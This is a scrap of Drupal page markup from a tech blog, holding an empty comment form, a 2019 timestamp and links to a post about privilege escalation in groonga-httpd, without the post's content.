<section class="field field--name-comment-node-blog field--type-comment field--label-hidden comment-wrapper"> </section> <section class="field field--name-comment field--type-comment field--label-above comment-wrapper"> <h2 class='title comment-form__title'> <i class="fa fa-comments-o"></i> Add new comment</h2> <drupal-render-placeholder callback="comment.lazy_builders:renderForm" arguments="0=node&amp;1=278&amp;2=comment&amp;3=comment" token="gm3BXsVi-55Kr8NZ8Sqnkq-hgDkw5pOYeXcWUQ1uut0"></drupal-render-placeholder> </section> Tue, 07 May 2019 20:32:56 +0000 Hoti 278 at https://tech.feedyourhead.at https://tech.feedyourhead.at/content/privilege-escalation-in-groonga-httpd#comments https://tech.feedyourhead.at/content/privilege-escalation-in-groonga-httpd#comments